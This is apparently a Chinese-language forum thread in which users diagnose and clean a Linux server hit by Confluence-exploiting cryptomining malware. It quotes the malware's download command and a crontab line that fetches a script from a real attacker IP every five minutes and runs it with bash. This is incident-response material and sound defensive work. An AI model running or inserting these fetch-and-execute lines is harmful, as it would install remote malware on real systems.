你的服务器看起来像是被黑客攻击了，请仔细查看进程列表。例如运行 ps auxc 命令并查看进程的二进制源代码。

你可以使用像 rkhunter 这样的工具来扫描你的服务器，但一般来说，你应该首先结束所有以 confluence 用户身份启动的进程，扫描你的服务器/账户，升级你的 Confluence（在大多数情况下用户确定了攻击来源），并查看你的 Confluence 是否有其他帐户等。

如果你想要查看该进程中的内容，请在 /proc 中查看，例如通过 ls -la /proc/996 命令。你也可以运行 strace -ff -p 996 命令来查看进程正在执行什么操作，或者运行 cat /proc/996/exe | strings 命令来查看二进制文件包含哪些字符串。这可能是某种 botnet 的一部分，矿工等。

我曾经遇到同样的问题，我的服务器被黑了，病毒脚本在 /tmp 目录下，通过运行 "top" 命令找到脚本名称（无关紧要的字母，我的脚本名称是 "fcbk6hj"），然后杀死相关进程（可能有三个进程）：

root 3158 1 0 15:18 ? 00:00:01 ./fcbk6hj ./jd8CKgl root 3159 1 0 15:18 ? 00:00:01 ./fcbk6hj ./5CDocHl root 3160 1 0 15:18 ? 00:00:11 ./fcbk6hj ./prot

杀掉所有这些进程并删除 /tmp/prot 文件，再杀掉/boot/vmlinuz 进程，CPU 的问题就解决了。

我发现病毒会自动下载脚本到 /tmp 目录下，我的解决方法是将 wgetak 更名为其他名称。

病毒的行为如下： wgetak -q http://51.38.133.232:80/86su.jpg -O ./KC5GkAo

发现以下任务被写入 crontab，只需要删除它： */5 * * * * /usr/bin/wgetak -q -O /tmp/seasame http://51.38.133.232:80 && bash /tmp/seasame

从系统和crontab中删除这个后，或许现在最好的想法是将confluence用户添加到/etc/cron.deny中。

之后：

$ crontab -e
You (confluence) are not allowed to use this program (crontab)
See crontab(1) for more information

我也遇到了同样的问题，可能是一个 Confluence 的 bug。我只需结束掉 Confluence 进程，然后问题就解决了。

正如您所发现的那样，这是恶意软件——实际上是加密货币挖矿恶意软件, 旨在使用您的CPU作为加密货币矿工。

您的服务器很可能因Confluence漏洞（请参见this reddit post的第一个答案）而被攻击，但应该知道这不是它唯一的传播途径——这一点无法强调得足够。事实上，我的一台服务器也被攻击了，尽管它没有运行Confluence（我甚至不知道这个软件…），所谓的/boot/vmlinuz进程由root运行。

此外，请注意，这种恶意软件会尝试通过known_hosts和SSH密钥通过SSH进行传播，因此您应该检查您从该服务器访问的其他计算机。

最后，Reddit帖子链接到这个恶意软件的全面描述，值得一读。

NB：不要忘记向IP的ISP滥用电子邮件地址发送报告。